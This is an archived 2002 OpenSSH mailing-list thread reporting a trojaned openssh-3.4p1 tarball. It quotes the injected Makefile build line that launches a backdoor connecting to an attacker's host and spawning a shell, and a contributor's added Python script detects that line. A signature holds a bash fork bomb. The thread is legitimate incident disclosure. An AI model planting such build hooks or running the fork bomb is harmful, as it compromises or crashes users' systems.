Wojtek Pilorz
2002-Aug-01 07:20 UTC
openssh-3.4p1.tar.gz on ftp.openbsd.org changing rather than frozen
I have seen that file ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz is continuously changing. This seems strange to me as I expected it should be a 'frozen' file; the signature and diff file are still dated Jun 26.

I am wondering whether this is intentional.

Best regards,
Wojtek
Jan IVEN
2002-Aug-01 10:53 UTC
openssh-3.4p1.tar.gz on ftp.openbsd.org changing rather than frozen
>>>>> "WP" == Wojtek Pilorz <wpilorz at bdk.pl> writes:

WP> I have seen that file
WP> ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
WP> is continuously changing.
WP> This seems strange to me as I expected it should be a 'frozen' file;
WP> The signature and diff file are still dated Jun 26.
WP> I am wondering whether this is intentional.

According to http://www.mavetju.org/weblog/weblog.php the tar file may be trojaned (or do the FreeBSD people keep a mirror, and that one has been trojaned)?

Regards
Jan
Magnus Bodin
2002-Aug-01 11:39 UTC
openssh-3.4p1.tar.gz on ftp.openbsd.org changing rather than frozen
On Thu, Aug 01, 2002 at 09:20:29AM +0200, Wojtek Pilorz wrote:
> I have seen that file
> ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
> is continuously changing.
> This seems strange to me as I expected it should be a 'frozen' file;
> The signature and diff file are still dated Jun 26.
>
> I am wondering whether this is intentional.

Read, read:

----- Forwarded message from Edwin Groothuis <edwin at mavetju.org> -----

Date: Thu, 1 Aug 2002 16:55:51 +1000
From: Edwin Groothuis <edwin at mavetju.org>
To: incidents at securityfocus.com
Subject: openssh-3.4p1.tar.gz trojaned

Greetings,

Just want to inform you that the OpenSSH package on ftp.openbsd.org (and probably all its mirrors now) is trojaned:

ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz

The OpenBSD people have been informed about it (via email to deraadt at openbsd.org and via irc.openprojects.org/#openbsd).

The changed file is openssh-3.4p1/openbsd-compat/Makefile.in:

    all: libopenbsd-compat.a
    +	@ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

bf-test.c[1] is nothing more than a wrapper which generates a shell-script[2] which compiles itself and tries to connect to a server running on 203.62.158.32:6667 (web.snsonline.net).

[1] http://www.mavetju.org/~edwin/bf-test.c
[2] http://www.mavetju.org/~edwin/bf-output.sh

This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD ports system:

MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:

MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

Edwin

--
Edwin Groothuis       | Personal website: http://www.MavEtJu.org
edwin at mavetju.org  | Weblog: http://www.mavetju.org/weblog/weblog.php
bash$ :(){ :|:&};:    | Interested in MUDs? http://www.FatalDimensions.org/
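As an added example (not from the thread, and not the OpenSSH project's own tooling): a Python check that compares a downloaded tarball's MD5 with the two digests Edwin quotes, and scans every Makefile.in inside the archive for the injected build hook without ever running the build. The recipe-line heuristic and the two sample archives are my own construction; only the digests and the quoted hook line come from the report.

```python
import hashlib
import io
import re
import tarfile

# Checksums as quoted in Edwin Groothuis's report (MD5 of the whole .tar.gz).
GOOD_MD5 = "459c1d0262e939d6432f193c7a4ba8a8"      # FreeBSD ports distinfo
TROJANED_MD5 = "3ac9bc346d736b4a51d676faa2a08a57"  # tarball seen on ftp.openbsd.org

# Recipe line that compiles something, then backgrounds a shell script: the shape
# of the injected "bf-test" hook quoted in the report (this heuristic is mine).
SUSPICIOUS_RECIPE = re.compile(r"^\t.*\$\(CC\).*;.*sh\s+\./\S+.*&\s*$")

def classify_tarball(data: bytes) -> str:
    """Compare the tarball's MD5 with the two digests from the report."""
    digest = hashlib.md5(data).hexdigest()
    if digest == GOOD_MD5:
        return "known-good"
    if digest == TROJANED_MD5:
        return "known-trojaned"
    return "unknown"

def find_build_hooks(tgz: bytes) -> list:
    """Return (member, line) for each Makefile.in line resembling the hook; the
    archive is inspected in memory and nothing from it is executed."""
    hits = []
    with tarfile.open(fileobj=io.BytesIO(tgz), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile() or not member.name.endswith("Makefile.in"):
                continue
            text = tar.extractfile(member).read().decode("utf-8", "replace")
            for line in text.splitlines():
                if "bf-test" in line or SUSPICIOUS_RECIPE.match(line):
                    hits.append((member.name, line.strip()))
    return hits

def build_sample_tarball(makefile_text: str) -> bytes:
    """Constructed sample archive holding only openbsd-compat/Makefile.in."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        payload = makefile_text.encode()
        info = tarfile.TarInfo("openssh-3.4p1/openbsd-compat/Makefile.in")
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()

CLEAN_MAKEFILE = "all: libopenbsd-compat.a\n"
# The extra recipe line is the one quoted in the report.
TROJANED_MAKEFILE = CLEAN_MAKEFILE + \
    "\t@ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &\n"
```

The MD5 comparison only tells the two tarballs named in this thread apart; the detached signature Wojtek noticed (still dated Jun 26) is the check that catches any modified tarball, since it will not verify against altered contents.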
Thomas Binder
2002-Aug-01 13:23 UTC
openssh-3.4p1.tar.gz on ftp.openbsd.org changing rather than frozen
Hi!

> bf-test.c[1] is nothing more than a wrapper which generates a
> shell-script[2] which compiles itself and tries to connect to a
> server running on 203.62.158.32:6667 (web.snsonline.net).

Well, not only does it try to connect, it also executes /bin/sh when it receives a certain response from that host.

Ciao

Thomas

--
According to Kentucky state law, every person must take a bath at least once a year.
SCHINCKE, KEITH (JSC-SM) (LM)
2002-Aug-01 14:21 UTC
openssh-3.4p1.tar.gz on ftp.openbsd.org changing rather than frozen
I am sure most people have already done this, but for the few who have not: slashdot.org has a news story about this. The important part: http://slashdot.org/comments.pl?sid=37188&cid=3991288

-----Original Message-----
From: Thomas Binder [mailto:binder at arago.de]
Sent: Thursday, August 01, 2002 8:24 AM
To: openssh-unix-dev at mindrot.org
Subject: Re: openssh-3.4p1.tar.gz on ftp.openbsd.org changing rather than frozen

Hi!

> bf-test.c[1] is nothing more than a wrapper which generates a
> shell-script[2] which compiles itself and tries to connect to a
> server running on 203.62.158.32:6667 (web.snsonline.net).

Well, not only does it try to connect, it also executes /bin/sh when it receives a certain response from that host.

Ciao

Thomas

--
According to Kentucky state law, every person must take a bath at least once a year.

_______________________________________________
openssh-unix-dev at mindrot.org mailing list
http://www.mindrot.org/mailman/listinfo/openssh-unix-dev